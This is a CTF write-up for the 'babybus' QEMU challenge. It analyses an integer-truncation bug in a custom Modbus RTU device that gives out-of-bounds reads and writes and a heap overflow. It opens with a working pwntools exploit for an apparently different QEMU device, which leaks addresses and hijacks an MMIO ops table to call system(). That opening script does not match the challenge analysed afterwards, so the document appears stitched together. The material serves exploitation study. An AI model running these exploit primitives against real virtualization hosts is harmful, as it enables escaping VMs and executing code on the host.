            qt.enable_cmd_mem_busmaster(bus, dev, fn)
            bar0 = qt.get_bar0(bus, dev, fn)
            if bar0 == 0:
                log.warning("BAR0 readback still 0; using MAP_BASE as BASE anyway (qtest sometimes does not read it back).")
                bar0 = map_base
        else:
            qt.enable_cmd_mem_busmaster(bus, dev, fn)

        self.BASE = bar0
        log.success(f"BAR0 = {self.BASE:#x}")

        self.REG_SIZE = self.BASE + 0x00
        self.REG_IDX = self.BASE + 0x08
        self.REG_SRC = self.BASE + 0x10
        self.REG_DST = self.BASE + 0x18
        self.REG_CNT = self.BASE + 0x20
        self.REG_CMD = self.BASE + 0x28
        self.REG_KICK = self.BASE + 0x30

        v = self.go()
        if v != 1:
            raise RuntimeError(f"MMIO not mapped? readq(BASE+0x30) -> {v:#x}, expect 1")
        log.info(f"SIZE(initial) = {self.get_size()}")

    def set_size(self, n):
        self.qt.writeq(self.REG_SIZE, n)

    def get_size(self):
        return self.qt.readq(self.REG_SIZE)

    def set_idx(self, i):
        self.qt.writeq(self.REG_IDX, i)

    def wr_desc(self, i, src=None, dst=None, cnt=None, cmd=None):
        self.set_idx(i)
        if src is not None:
            self.qt.writeq(self.REG_SRC, src)
        if dst is not None:
            self.qt.writeq(self.REG_DST, dst)
        if cnt is not None:
            self.qt.writeq(self.REG_CNT, cnt)
        if cmd is not None:
            self.qt.writeq(self.REG_CMD, cmd & 1)

    def go(self):
        return self.qt.readq(self.REG_KICK)

    def oob_read_before(self, neg_off, nbytes, ram_out):
        """
        Starting neg_off bytes before the start of dma_buf, read nbytes into guest RAM.
        Constraint: 0 < neg_off <= nbytes <= 0x1000
        """
        assert 0 < neg_off <= 0x1000
        assert nbytes >= neg_off and nbytes <= 0x1000
        self.set_size(1)
        self.wr_desc(0, src=u64_neg(neg_off), dst=ram_out, cnt=nbytes, cmd=1)
        self.go()
        return self.qt.mem_read(ram_out, nbytes)

    def oob_write_before(self, neg_off, payload: bytes, ram_src=0x220000, pad_byte=b'\x00'):
        """
        Starting neg_off bytes before the start of dma_buf, write payload.
        To pass the check, cnt >= neg_off and cnt <= 0x1000 are required.
        If len(payload) < neg_off, the payload is zero-padded up to neg_off
        (the padding overwrites everything between the payload and the buffer start).
        """
        assert 0 < neg_off <= 0x1000
        cnt = max(len(payload), neg_off)
        assert cnt <= 0x1000
        if len(payload) < cnt:
            payload = payload + pad_byte * (cnt - len(payload))
        self.qt.mem_write(ram_src, payload)
        self.set_size(1)
        self.wr_desc(0, src=ram_src, dst=u64_neg(neg_off), cnt=cnt, cmd=0)
        self.go()


def find_qemu_pid(ppid):
    try:
        exe = os.path.basename(os.readlink(f"/proc/{ppid}/exe"))
    except Exception:
        return ppid
    if exe.startswith("qemu-system"):
        return ppid
    try:
        with open(f"/proc/{ppid}/task/{ppid}/children") as f:
            kids = [int(x) for x in f.read().strip().split()]
        for k in kids:
            try:
                name = os.path.basename(os.readlink(f"/proc/{k}/exe"))
                if name.startswith("qemu-system"):
                    return k
            except Exception:
                pass
    except Exception:
        pass
    return ppid


def maybe_attach_gdb(proc):
    if os.getenv('GDB'):
        time.sleep(0.2)
        qpid = find_qemu_pid(proc.pid)
        gdbscript = os.getenv('GDBSCRIPT', 'b system\nc\n')
        log.info(f"Attaching gdb to PID {qpid}")
        try:
            gdb.attach(qpid, gdbscript=gdbscript, exe="./qemu-system-x86_64")
            pause()
        except Exception as e:
            log.warning(f"GDB attach failed: {e} (tip: sudo sysctl -w kernel.yama.ptrace_scope=0)")


def main():
    qt = QTest(["./launch.sh"])
    qwb = QWB(qt, base=0xf0000000)
    qemu = ELF("./qemu-system-x86_64")

    leak = qwb.oob_read_before(neg_off=0x4b8, nbytes=0x600, ram_out=0x300000)
    print(hexdump(leak))
    QWBState_addr = u64(leak[0x8:0x8 + 8])
    success("QWBState_addr: " + hex(QWBState_addr))
    qemu.address = u64(leak[0x30:0x30 + 8]) - qemu.sym['memory_region_destructor_none']
    success("qemu base: " + hex(qemu.address))

    maybe_attach_gdb(qt.p)

    leak = bytearray(leak)
    leak[0:8] = p64(QWBState_addr + 0xe00)

    qwb_mmio_ops = flat(
        p64(qemu.plt['system']),
        p64(qemu.plt['system']),
        p64(0),
        p64(0),

        p32(0),
        p32(0),

        p32(4),
        p32(8),
        p32(0),
        p32(0),
        p64(0),

        p32(4),
        p32(8),
        p32(0),
        p32(0),
    )

    cmd = "/usr/bin/gnome-calculator"

    leak[0x4b8:0x4b8 + len(qwb_mmio_ops)] = qwb_mmio_ops
    leak[0x4b8 + len(qwb_mmio_ops):0x4b8 + len(qwb_mmio_ops) + len(cmd)] = cmd.encode()
    leak[0x8:0x8 + 8] = p64(QWBState_addr + 0xe00 + len(qwb_mmio_ops))

    leak = bytes(leak)

    qwb.oob_write_before(neg_off=0x4b8, payload=leak)
    pause()
    qwb.oob_write_before(neg_off=0x4b8, payload=leak)

    qt.p.interactive()


if __name__ == "__main__":
    main()
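2025qwb-babybus

Environment setup

Building QEMU

The challenge binary is stripped, so we build the same QEMU version ourselves and then import that build's function signatures and structure definitions into the QEMU binary shipped with the challenge.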
Running the binary, or searching its strings, shows that the QEMU version is 10.1.0:

```
QEMU emulator version 10.1.0 (v10.1.0-2-g07e6d49-dirty)
Copyright (c) 2003-2025 Fabrice Bellard and the QEMU Project developers
```
First install the build dependencies:

```shell
sudo sed -i 's/^# deb-src/deb-src/' /etc/apt/sources.list
sudo apt update
sudo apt build-dep -y qemu

sudo apt install -y git build-essential ninja-build meson pkg-config python3 \
    libglib2.0-dev libpixman-1-dev zlib1g-dev libfdt-dev \
    libsdl2-dev libgtk-3-dev libspice-server-dev libspice-protocol-dev \
    libpulse-dev libasound2-dev libusb-1.0-0-dev libusbredirhost-dev libusbredirparser-dev \
    libslirp-dev libiscsi-dev libnfs-dev libaio-dev liburing-dev libnuma-dev \
    libzstd-dev liblz4-dev libsnappy-dev bzip2 libbz2-dev lzop liblzo2-dev \
    libcapstone-dev libseccomp-dev libcap-ng-dev

sudo apt install -y python3-venv python3-pip python3-setuptools python3-wheel
```
Then build:

```shell
mkdir -p ~/src && cd ~/src
curl -LO https://download.qemu.org/qemu-10.1.0.tar.xz
tar -xf qemu-10.1.0.tar.xz

cd ~/src/qemu-10.1.0
rm -rf build-static
mkdir build-static && cd build-static

../configure \
    --prefix=$HOME/.local/qemu-10.1-static \
    --target-list=x86_64-softmmu \
    --disable-capstone --disable-slirp --disable-spice \
    --disable-gtk --disable-sdl --disable-virglrenderer \
    --disable-curl --disable-libssh --disable-libiscsi --disable-libnfs \
    --disable-plugins --disable-tools \
    --enable-debug --disable-strip \
    --disable-pie \
    -Ddefault_library=static \
    -Db_pie=false \
    -Dc_args='-fno-PIE' \
    -Dc_link_args='-no-pie'

ninja -C . qemu-system-x86_64
```
Debugging environment

The Dockerfile needs to install gdbserver and expose port 2345:

```dockerfile
FROM ubuntu:24.04

RUN apt-get update && apt-get upgrade -y && \
    apt-get install -y \
    libglib2.0-0 \
    libpixman-1-0 \
    libusb-1.0-0 \
    libgnutls30 \
    libslirp0 \
    libfdt1 \
    gdbserver \
    && rm -rf /var/lib/apt/lists/*

COPY docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
RUN chmod +x /usr/local/bin/docker-entrypoint.sh

RUN useradd -m ctf
WORKDIR /home/ctf

COPY qemu-system-x86_64 qemu-system-x86_64
COPY run.sh run.sh
RUN chmod +x qemu-system-x86_64 run.sh

USER ctf
ENV PORT=1502
EXPOSE 1502
EXPOSE 2345

ENTRYPOINT ["/usr/local/bin/docker-entrypoint.sh"]
```
Add a DEBUG_SERVER mode (listening on 2345) to the entrypoint script:

```shell
#!/usr/bin/env sh

FLAG_PATH=/home/ctf/flag
FLAG_MODE=M_ECHO
if [ ${ICQ_FLAG} ];then
    case $FLAG_MODE in
    "M_ECHO")
        echo -n ${ICQ_FLAG} > ${FLAG_PATH}
        FILE_MODE=755
        chmod ${FILE_MODE} ${FLAG_PATH}
        ;;
    "M_SED")
        sed -i -r "s/flag\{.*\}/${ICQ_FLAG}/" ${FLAG_PATH}
        ;;
    "M_SQL")
        ;;
    *)
        ;;
    esac
    echo [+] ICQ_FLAG OK
    unset ICQ_FLAG
else
    echo [!] no ICQ_FLAG
fi

rm -rf /etc/profile.d/pouchenv.sh
rm -rf /etc/instanceInfo

set -eu

HOST="${HOST:-0.0.0.0}"
PORT="${PORT:-1502}"
RESTART_DELAY="${RESTART_DELAY:-1}"
UNIT_ID="${UNIT_ID:-1}"
TIMER_RESTART="${TIMER_RESTART:-20}"

DEBUG_SERVER="${DEBUG_SERVER:-0}"
GDB_PORT="${GDB_PORT:-2345}"
DEBUG_AUTORESTART="${DEBUG_AUTORESTART:-0}"
DEBUG_RESTART_DELAY="${DEBUG_RESTART_DELAY:-1}"

# Debug mode: run QEMU under gdbserver instead of the timed restart loop.
if [ "$DEBUG_SERVER" = "1" ]; then
    echo "[entrypoint] DEBUG_SERVER=1: gdbserver on :$GDB_PORT (TIMER_RESTART disabled)"
    TIMER_RESTART=0
    set +e
    while true; do
        set -x
        gdbserver 0.0.0.0:${GDB_PORT} /home/ctf/qemu-system-x86_64 \
            -machine none \
            -nographic \
            -nodefaults \
            -chardev socket,id=mbus,host=0.0.0.0,port=1502,server=on,wait=off \
            -device modbus-rtu,chardev=mbus,unit-id=1
        exit_code=$?
        set +x
        if [ "${DEBUG_AUTORESTART}" != "1" ]; then
            echo "[entrypoint] gdbserver exited with code ${exit_code}, not restarting (DEBUG_AUTORESTART=0)"
            exit "${exit_code}"
        fi
        echo "[entrypoint] gdbserver exited with code ${exit_code}, restarting in ${DEBUG_RESTART_DELAY}s"
        sleep "${DEBUG_RESTART_DELAY}"
    done
fi

GEN_RUN="/home/ctf/run.sh"

trap 'echo "[entrypoint] received signal, exiting"; exit 0' INT TERM

start_time=$(date +%s)

while true; do
    echo "[entrypoint] starting QEMU on ${HOST}:${PORT}"

    if [ "${TIMER_RESTART}" -gt 0 ]; then
        echo "[entrypoint] timer restart enabled: ${TIMER_RESTART}s"
        set +e
        timeout "${TIMER_RESTART}" "${GEN_RUN}"
        exit_code=$?
        set -e

        current_time=$(date +%s)
        runtime=$((current_time - start_time))

        if [ $exit_code -eq 124 ]; then
            echo "[entrypoint] qemu timed out after ${TIMER_RESTART}s (runtime: ${runtime}s), restarting"
        else
            echo "[entrypoint] qemu exited with code ${exit_code} after ${runtime}s, restart in ${RESTART_DELAY}s"
            sleep "${RESTART_DELAY}"
        fi
    else
        set +e
        "${GEN_RUN}"
        exit_code=$?
        set -e

        current_time=$(date +%s)
        runtime=$((current_time - start_time))
        echo "[entrypoint] qemu exited with code ${exit_code} after ${runtime}s, restart in ${RESTART_DELAY}s"
        sleep "${RESTART_DELAY}"
    fi

    start_time=$(date +%s)
done
```
Build the Docker image:

```shell
docker build -t babybus .
```
Then start the container. For convenience while debugging, the following loop restarts it automatically:

```shell
while true; do
    docker run --rm -it \
        --name babybus \
        -e ICQ_FLAG=flag{fake_flag} \
        -e DEBUG_SERVER=1 \
        -p 1502:1502 -p 2345:2345 \
        --cap-add=SYS_PTRACE \
        --security-opt seccomp=unconfined \
        babybus

    code=$?
    if [[ $code -eq 130 || $code -eq 143 ]]; then
        echo "Interrupted, leaving the loop."
        exit 0
    fi

    echo "Container exited with status $code, restarting in 2 s (Ctrl+C to stop)"
    sleep 2
done
```
Vulnerability analysis

The challenge is a QEMU character device that speaks the Modbus RTU protocol.

Once started, QEMU runs no CPU and no system image (-machine none -nodefaults). It only registers and runs one custom peripheral, modbus-rtu, and attaches it to a TCP port (1502 by default) through a QEMU chardev socket:

```shell
./qemu-system-x86_64 \
    -machine none \
    -nographic \
    -nodefaults \
    -chardev socket,id=mbus,host=0.0.0.0,port=1502,server=on,wait=off \
    -device modbus-rtu,chardev=mbus,unit-id=1
```
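-machine none: no virtual machine and no guest, just a device running.
-chardev socket,server=on,host=0.0.0.0,port=1502: QEMU opens a TCP server listening on port 1502, with id mbus.
-device modbus-rtu,chardev=mbus,unit-id=1: registers a Modbus RTU slave device with slave address (unit-id) 1, and sets its CharBackend to the mbus chardev defined above.

Listening on a network port is not implemented in the device code at all. It is done by QEMU's chardev backend layer. The device code only deals with a character stream; whether that stream comes from a TCP port, a UNIX socket, a PTY, a pipe or stdio is decided by the backend type given to -chardev.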
Device frontend (FE): ModbusRtuState contains a CharBackend chr; member, and realize() calls:
qemu_chr_fe_set_handlers(&s->chr, ...) to register the callbacks (how much can be read, data received, opened event).
qemu_chr_fe_write_all(&s->chr, ...) to send data.
Backend (BE): created by -chardev ...,id=XXX on the command line, for example socket, pty, pipe, file or stdio. Each backend performs the actual I/O:
-chardev socket,...,server=on,host=...,port=... → listens on a TCP port;
-chardev socket,...,path=/tmp/mbus.sock,server=on → listens on a UNIX domain socket;
-chardev pty,id=... → creates a pseudo-terminal;
-chardev stdio,id=... → uses QEMU's standard input and output;
and so on.
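The two are then bound together on the device:

```shell
-device modbus-rtu,chardev=XXX,unit-id=1
```

The device only knows that it has a CharBackend named XXX; it does not care whether a network port is behind it.

The complete source of the challenge device is as follows: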
```c
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "hw/qdev-core.h"
#include "qemu/module.h"
#include "chardev/char-fe.h"
#include "hw/qdev-properties.h"
#include "qemu/bswap.h"
#include "qemu/log.h"

#define TYPE_MODBUS_RTU "modbus-rtu"
OBJECT_DECLARE_SIMPLE_TYPE(ModbusRtuState, MODBUS_RTU)

enum {
    MODBUS_FC_READ_HOLDING   = 0x03,
    MODBUS_FC_WRITE_MULTIPLE = 0x10,
};

enum {
    MODBUS_EX_ILLEGAL_FUNCTION   = 0x01,
    MODBUS_EX_ILLEGAL_DATA_ADDR  = 0x02,
    MODBUS_EX_ILLEGAL_DATA_VALUE = 0x03,
};

typedef struct ModbusRtuState {
    DeviceState parent_obj;
    CharBackend chr;
    uint8_t unit_id;
    uint16_t regs[256];
    uint8_t rx_buf[260];
    size_t rx_len;
} ModbusRtuState;

static inline uint16_t be16_load(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static inline void be16_store(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v >> 8);
    p[1] = (uint8_t)(v & 0xFF);
}

static uint16_t modbus_crc16(const uint8_t *buf, size_t len)
{
    uint16_t crc = 0xFFFF;
    for (size_t i = 0; i < len; i++) {
        crc ^= buf[i];
        for (int b = 0; b < 8; b++) {
            if (crc & 0x0001) {
                crc = (crc >> 1) ^ 0xA001;
            } else {
                crc >>= 1;
            }
        }
    }
    return crc;
}

static void modbus_send(ModbusRtuState *s, const uint8_t *buf, size_t len)
{
    qemu_chr_fe_write_all(&s->chr, buf, len);
}

static void modbus_send_exception(ModbusRtuState *s, uint8_t addr,
                                  uint8_t func, uint8_t ex)
{
    uint8_t out[5];
    out[0] = addr;
    out[1] = (uint8_t)(func | 0x80);
    out[2] = ex;
    uint16_t crc = modbus_crc16(out, 3);
    out[3] = (uint8_t)(crc & 0xFF);
    out[4] = (uint8_t)(crc >> 8);
    modbus_send(s, out, sizeof(out));
}

static void modbus_handle_fc03(ModbusRtuState *s, const uint8_t *req)
{
    const uint8_t addr = req[0];
    const uint16_t start = be16_load(&req[2]);
    const uint16_t count = be16_load(&req[4]);

    if (count == 0 || (uint16_t)(start + count) > 0x100U) {
        modbus_send_exception(s, addr, MODBUS_FC_READ_HOLDING,
                              MODBUS_EX_ILLEGAL_DATA_ADDR);
        return;
    }

    uint8_t byte_count = count * 2;
    size_t out_len = 3 + byte_count + 2;
    uint8_t *out = g_malloc(out_len);

    out[0] = addr;
    out[1] = MODBUS_FC_READ_HOLDING;
    out[2] = byte_count;

    size_t p = 3;
    for (uint16_t i = 0; i < count; i++) {
        uint16_t v = s->regs[start + i];
        out[p++] = (uint8_t)(v >> 8);
        out[p++] = (uint8_t)(v & 0xFF);
    }

    uint16_t crc = modbus_crc16(out, out_len - 2);
    out[out_len - 2] = (uint8_t)(crc & 0xFF);
    out[out_len - 1] = (uint8_t)(crc >> 8);

    modbus_send(s, out, out_len);
    g_free(out);
}

static void modbus_handle_fc10(ModbusRtuState *s, const uint8_t *req)
{
    const uint8_t addr = req[0];
    const uint16_t start = be16_load(&req[2]);
    const uint16_t count = be16_load(&req[4]);
    const uint8_t byte_count = req[6];

    if (count == 0 || (uint16_t)(start + count) > 0x100U) {
        modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE,
                              MODBUS_EX_ILLEGAL_DATA_ADDR);
        return;
    }

    if (byte_count != 2 * count) {
        modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE,
                              MODBUS_EX_ILLEGAL_DATA_VALUE);
        return;
    }

    for (uint16_t i = 0; i < count; i++) {
        uint16_t v = be16_load(&req[7 + 2 * i]);
        s->regs[start + i] = v;
    }

    uint8_t out[8];
    out[0] = addr;
    out[1] = MODBUS_FC_WRITE_MULTIPLE;
    be16_store(&out[2], start);
    be16_store(&out[4], count);
    uint16_t crc = modbus_crc16(out, 6);
    out[6] = (uint8_t)(crc & 0xFF);
    out[7] = (uint8_t)(crc >> 8);
    modbus_send(s, out, sizeof(out));
}

static bool modbus_try_parse(ModbusRtuState *s)
{
    if (s->rx_len <= 3) {
        return false;
    }

    const uint8_t *buf = s->rx_buf;
    const uint8_t addr = buf[0];
    const uint8_t func = buf[1];
    size_t need = 0;

    if (func == MODBUS_FC_READ_HOLDING) {
        need = 8;
        if (s->rx_len < need) {
            return false;
        }
    } else if (func == MODBUS_FC_WRITE_MULTIPLE) {
        if (s->rx_len <= 6) {
            return false;
        }
        need = (size_t)buf[6] + 9;
        if (s->rx_len < need) {
            return false;
        }
    } else {
        if (s->rx_len <= 3) {
            return false;
        }
        modbus_send_exception(s, addr, func, MODBUS_EX_ILLEGAL_FUNCTION);
        memmove(s->rx_buf, s->rx_buf + 1, s->rx_len - 1);
        s->rx_len -= 1;
        return true;
    }

    uint16_t rx_crc = (uint16_t)(buf[need - 2] | (buf[need - 1] << 8));
    uint16_t want = modbus_crc16(buf, need - 2);
    if (rx_crc != want) {
        memmove(s->rx_buf, s->rx_buf + 1, s->rx_len - 1);
        s->rx_len -= 1;
        return true;
    }

    if (addr == s->unit_id || addr == 0x00) {
        if (func == MODBUS_FC_READ_HOLDING) {
            modbus_handle_fc03(s, buf);
        } else if (func == MODBUS_FC_WRITE_MULTIPLE) {
            modbus_handle_fc10(s, buf);
        }
    }

    memmove(s->rx_buf, s->rx_buf + need, s->rx_len - need);
    s->rx_len -= need;
    return true;
}

static int modbus_can_read(void *opaque)
{
    ModbusRtuState *s = MODBUS_RTU(opaque);
    int cap = (int)(sizeof(s->rx_buf) - s->rx_len);
    return cap > 0 ? cap : 0;
}

static void modbus_read(void *opaque, const uint8_t *buf, int size)
{
    ModbusRtuState *s = MODBUS_RTU(opaque);
    if (size <= 0) {
        return;
    }

    size_t n = size;
    if (n > sizeof(s->rx_buf) - s->rx_len) {
        n = sizeof(s->rx_buf) - s->rx_len;
    }
    if (n) {
        memcpy(s->rx_buf + s->rx_len, buf, n);
        s->rx_len += n;
    }

    while (modbus_try_parse(s)) {
    }
}

static void modbus_event(void *opaque, QEMUChrEvent event)
{
    ModbusRtuState *s = MODBUS_RTU(opaque);
    if (event == CHR_EVENT_OPENED) {
        s->rx_len = 0;
    }
}

static void modbus_realize(DeviceState *dev, Error **errp)
{
    ModbusRtuState *s = MODBUS_RTU(dev);

    if (!qemu_chr_fe_backend_connected(&s->chr)) {
        error_setg(errp, "Can't create modbus-rtu device, empty char device");
        return;
    }

    memset(s->regs, 0, sizeof(s->regs));
    s->rx_len = 0;

    qemu_chr_fe_set_handlers(&s->chr, modbus_can_read, modbus_read,
                             modbus_event, s, NULL);
}

static void modbus_unrealize(DeviceState *dev)
{
    ModbusRtuState *s = MODBUS_RTU(dev);
    qemu_chr_fe_set_handlers(&s->chr, NULL, NULL, NULL, NULL, NULL);
}

static Property modbus_properties[] = {
    DEFINE_PROP_CHR("chardev", ModbusRtuState, chr),
    DEFINE_PROP_UINT8("unit-id", ModbusRtuState, unit_id, 1),
    DEFINE_PROP_END_OF_LIST(),
};

static void modbus_class_init(ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(klass);
    dc->realize = modbus_realize;
    dc->unrealize = modbus_unrealize;
    device_class_set_props(dc, modbus_properties);
}

static const TypeInfo modbus_type_info = {
    .name = TYPE_MODBUS_RTU,
    .parent = TYPE_DEVICE,
    .instance_size = sizeof(ModbusRtuState),
    .class_init = modbus_class_init,
};

static void modbus_register_types(void)
{
    type_register_static(&modbus_type_info);
}

type_init(modbus_register_types);
```
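To talk to this device a client has to frame its requests the way modbus_try_parse expects: 6 header bytes followed by a CRC-16 sent low byte first. The following is a minimal Python sketch of that framing for function 0x03. The helper name build_fc03 is hypothetical (it is not part of the original exploit script); the CRC routine simply mirrors modbus_crc16 from the source above.

```python
import struct


def modbus_crc16(data: bytes) -> int:
    """CRC-16/MODBUS, a direct port of modbus_crc16() in the device source."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc


def build_fc03(unit_id: int, start: int, count: int) -> bytes:
    """Hypothetical helper: build the 8-byte Read Holding Registers request."""
    # addr, func, start (big-endian), count (big-endian)
    body = struct.pack(">BBHH", unit_id, 0x03, start & 0xFFFF, count & 0xFFFF)
    # The device reads the CRC as buf[need-2] | buf[need-1] << 8, i.e. little-endian.
    return body + struct.pack("<H", modbus_crc16(body))


frame = build_fc03(1, 0x0000, 1)
print(frame.hex())  # 010300000001840a
```

Sending these bytes to TCP port 1502 (for example with a plain socket or a pwntools remote) should produce a reply from the device, assuming the unit id matches.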
Core bug: the code intends the valid range to be (start + count) ≤ 0x100 (256), but the comparison truncates the sum to 16 bits:

```c
(uint16_t)(start + count) <= 0x100
```
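This means that a very large start (for example close to 0xFFFF) combined with a small count makes (start + count) & 0xFFFF wrap around to a small value and pass the check. The actual read or write, however, uses s->regs[start + i]. Both operands are promoted to int, so the index is not truncated and the real start is used. That is a huge positive offset into a 256-entry array, which reads or writes memory outside the array.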
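The mismatch between the truncated check and the untruncated index can be modelled in a few lines of Python. This is only a sketch of the arithmetic; the function names are made up for illustration.

```python
def passes_check(start: int, count: int) -> bool:
    """Model of the device check: accept unless count == 0 or (uint16_t)(start + count) > 0x100."""
    start &= 0xFFFF
    count &= 0xFFFF
    return count != 0 and ((start + count) & 0xFFFF) <= 0x100


def first_byte_offset(start: int) -> int:
    """Byte offset from regs_base of s->regs[start] (each register is 2 bytes)."""
    return 2 * (start & 0xFFFF)


# An honest out-of-range request is rejected...
print(passes_check(0x00F0, 0x20))        # False: 0x110 > 0x100
# ...but a wrapped one is accepted: 0xFF81 + 127 = 0x10000 -> 0 after truncation.
print(passes_check(0xFF81, 127))         # True
print(hex(first_byte_offset(0xFF81)))    # 0x1ff02, far past the 512-byte regs array
```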
Schematic view (unit: bytes; regs occupies 512 bytes):

```
|<-------------- ModbusRtuState (device object, on the heap) -------------->|
... [ regs: 512 bytes ] ... [ other fields / other heap chunks / other mappings ... ]
      ^ base = regs_base
        accessed address = regs_base + 2*(start + i)
```
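As soon as 2*(start + i) is larger than 512, the access lands in whatever memory follows regs (other objects, metadata and pointers in the same heap arena). This gives two primitives:
0x03, out-of-bounds read (OOB read): memory outside the array is read, packed and sent back.
0x10, out-of-bounds write (OOB write): bytes from the request are written to memory outside the array. Combined with 0x03 this allows a second-stage leak or direct corruption of objects and heap state.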
0x03: out-of-bounds read

```c
static void modbus_handle_fc03(ModbusRtuState *s, const uint8_t *req)
{
    const uint8_t addr = req[0];
    const uint16_t start = be16_load(&req[2]);
    const uint16_t count = be16_load(&req[4]);

    /* Bug 1: the sum is truncated to 16 bits before the comparison. */
    if (count == 0 || (uint16_t)(start + count) > 0x100U) {
        modbus_send_exception(s, addr, MODBUS_FC_READ_HOLDING,
                              MODBUS_EX_ILLEGAL_DATA_ADDR);
        return;
    }

    /* Bug 2: 2*count is truncated to 8 bits, so out can be under-allocated. */
    uint8_t byte_count = count * 2;
    size_t out_len = 3 + byte_count + 2;
    uint8_t *out = g_malloc(out_len);

    out[0] = addr;
    out[1] = MODBUS_FC_READ_HOLDING;
    out[2] = byte_count;

    size_t p = 3;
    for (uint16_t i = 0; i < count; i++) {
        /* start + i is computed as int, so the index is not truncated. */
        uint16_t v = s->regs[start + i];
        out[p++] = (uint8_t)(v >> 8);
        out[p++] = (uint8_t)(v & 0xFF);
    }

    uint16_t crc = modbus_crc16(out, out_len - 2);
    out[out_len - 2] = (uint8_t)(crc & 0xFF);
    out[out_len - 1] = (uint8_t)(crc >> 8);

    modbus_send(s, out, out_len);
    g_free(out);
}
```
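Each register is 2 bytes, so reading count registers touches the byte range [2*start, 2*(start + count) - 1] relative to regs_base.
To read data, start and count must satisfy the following:
Pass the address check: count >= 1 and (uint16_t)(start + count) <= 0x100 (with 16-bit wrap-around).
Avoid the heap overflow: the reply buffer is sized from byte_count = (uint8_t)(2*count), so count ≥ 128 under-allocates the buffer and overflows the heap. For a stable leak that does not crash, keep count ≤ 127.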
The code processes the request if and only if:

$$
\mathbf{count} \ge 1 \quad\text{and}\quad \bigl((\mathbf{start}+\mathbf{count}) \bmod 2^{16}\bigr) \le 256.
$$

For a fixed count, this is equivalent to the following set of allowed start values:

$$
\boxed{\ \mathbf{start} \in \bigl[-\mathbf{count},\ 256-\mathbf{count}\bigr] \pmod{2^{16}}\ }
$$

Written as concrete intervals, this depends on the size of count. If count ≤ 256:

$$
\mathbf{start} \in [0,\ 256-\mathbf{count}] \ \cup\ [65536-\mathbf{count},\ 65535].
$$

If count > 256 (there are still 257 allowed values, but they all fall into a single high segment):

$$
\mathbf{start} \in [65536-\mathbf{count},\ 65536+256-\mathbf{count}] \quad (\text{a contiguous interval modulo } 2^{16} \text{ on } [0, 65535]).
$$
The read loop indexes with the real, untruncated index:

$$
\texttt{v} = \texttt{s->regs[start + i]},\quad i = 0 \dots \mathbf{count}-1.
$$

The byte range relative to regs_base is therefore:

$$
\boxed{\ \bigl[\, 2\cdot\mathbf{start},\ 2\cdot(\mathbf{start}+\mathbf{count})-1 \,\bigr]\ }
$$

with a total length of:

$$
\boxed{\, 2\cdot\mathbf{count}\ \text{bytes} \,}
$$

When $\mathbf{start} \ge 256$ or $\mathbf{start}+\mathbf{count}-1 \ge 256$, this range leaves the valid [0..511] and becomes an out-of-bounds read.
The FC03 reply allocation does not match what is actually written:

$$
\text{byte\_count} = \bigl(2\cdot\mathbf{count}\bigr)\ \&\ \mathrm{0xFF}, \qquad \text{out\_len} = 3 + \text{byte\_count} + 2,
$$

but the loop fills in $2\cdot\mathbf{count}$ bytes. When $\mathbf{count} \ge 128$ the buffer is under-allocated and the heap is written out of bounds.

For a stable out-of-bounds read that does not crash, take:

$$
\boxed{\, \mathbf{count} \le 127 \,}
$$

In that case:

$$
\text{out\_len} = 3 + 2\cdot\mathbf{count} + 2 \le 259 \le 260,
$$

so the allocation matches what is written, and the reply also stays within the 260-byte RX buffer size.
Example (the parameters used in the script): with $\mathbf{count}=127$ and $\mathbf{start}=\mathrm{0xFF81}$:

$$
\bigl[\, 2\cdot\mathrm{0xFF81},\ 2\cdot(\mathrm{0xFF81}+127)-1 \,\bigr] = \bigl[\, \mathrm{0x1FF02},\ \mathrm{0x1FFFF} \,\bigr],
$$

which lies entirely in the heap memory after regs and is convenient for a stable leak.

So we can take count = 127. Since start is a 16-bit field, the out-of-bounds choices for start are then [0xff81, 0xffff]. Any of them passes the check and reads the 254 bytes in [2*start, 2*start + 0xfd].
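The interval description above can be cross-checked by brute force. The sketch below enumerates every 16-bit start that passes the check for a given count and reports which of them actually reach past regs; the function names are illustrative only.

```python
def allowed_starts(count):
    """All 16-bit start values accepted by the device check for this count."""
    if count == 0:
        return []
    return [s for s in range(0x10000) if ((s + count) & 0xFFFF) <= 0x100]


def byte_range(start, count):
    """Inclusive byte range touched, relative to regs_base."""
    return 2 * start, 2 * (start + count) - 1


COUNT = 127
starts = allowed_starts(COUNT)
# A request is out of bounds when its last register index exceeds 255.
oob = [s for s in starts if s + COUNT > 256]

print(len(starts))                      # 257
print(hex(min(oob)), hex(max(oob)))     # 0xff81 0xffff
lo, hi = byte_range(0xFF81, COUNT)
print(hex(lo), hex(hi))                 # 0x1ff02 0x1ffff
```

The 257 accepted values split into the in-bounds low interval [0, 129] and the wrapped high interval [0xff81, 0xffff], which matches the closed-form intervals given earlier.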
0x03: heap overflow

The data read by function 0x03 is written into a heap chunk obtained from g_malloc:

```c
uint8_t byte_count = count * 2;
size_t out_len = 3 + byte_count + 2;
uint8_t *out = g_malloc(out_len);
```
FC03 never writes to regs, so it gives no out-of-bounds write next to regs. The heap write overflow happens while the FC03 reply is being built. Relative to the out buffer, the register data written past the intended payload area covers:

$$
\bigl[\, \texttt{out}+3+\text{byte\_count},\ \texttt{out}+3+2\cdot\mathbf{count}-1 \,\bigr].
$$

The size of the allocated chunk follows from:

$$
\text{byte\_count} = (2\cdot\mathbf{count}) \bmod 256
$$

$$
\boxed{\, \text{out\_len} = 3 + \text{byte\_count} + 2 = 5 + \bigl((2\cdot\mathbf{count}) \bmod 256\bigr) \,}
$$

Since $2\cdot\mathbf{count}$ is always even, $\text{byte\_count} \in \{0, 2, 4, \dots, 254\}$, and therefore $\boxed{\, \text{out\_len} \in \{5, 7, 9, \dots, 259\} \,}$.

The number of overflowing bytes $\Delta$ is:

$$
\boxed{\ \Delta = 2\cdot\mathbf{count} - \bigl((2\cdot\mathbf{count}) \bmod 256\bigr) = 256 \times \left\lfloor \dfrac{2\cdot\mathbf{count}}{256} \right\rfloor\ }
$$

